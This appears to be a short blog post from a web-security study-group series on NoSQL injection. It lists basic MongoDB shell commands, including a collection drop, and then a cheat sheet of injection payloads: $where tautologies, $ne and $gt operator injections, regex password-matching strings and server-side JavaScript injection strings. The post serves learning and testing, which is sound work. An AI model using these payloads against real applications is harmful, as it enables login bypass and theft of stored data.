p3n7a90n

NoSqli

 Web Security/Null-Web-Study-Group  2 mins

Hi there!,

This is the fourth topic in this series. You can have a look at other topics also for getting a better idea about the series and the pattern.

Fourth Topic - NoSql Injection

Resources

Tools

Labs

Basic Commands to query the Nosql database

show databases       Lists all the databases available.
use db               To use the given database.
db                   Output the current database.
show collections     Lists all the collections/tables available in the current database.
db.<collection>.find() or db.getCollection("CollectionName").find() Performs a query on a collection or a view and returns a cursor object.
db.<collection>.drop() Removes the specified collection from the database.

Common Payloads

true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1

## SSJI Injection
';return 'a'=='a' && ''=='
\";return(false);var xyz='a", "\";return(true);var xyz='a

References

Feel free to drop any suggestions via my social handles.
Thanks for reading!!!.

See Also:

Load Comments?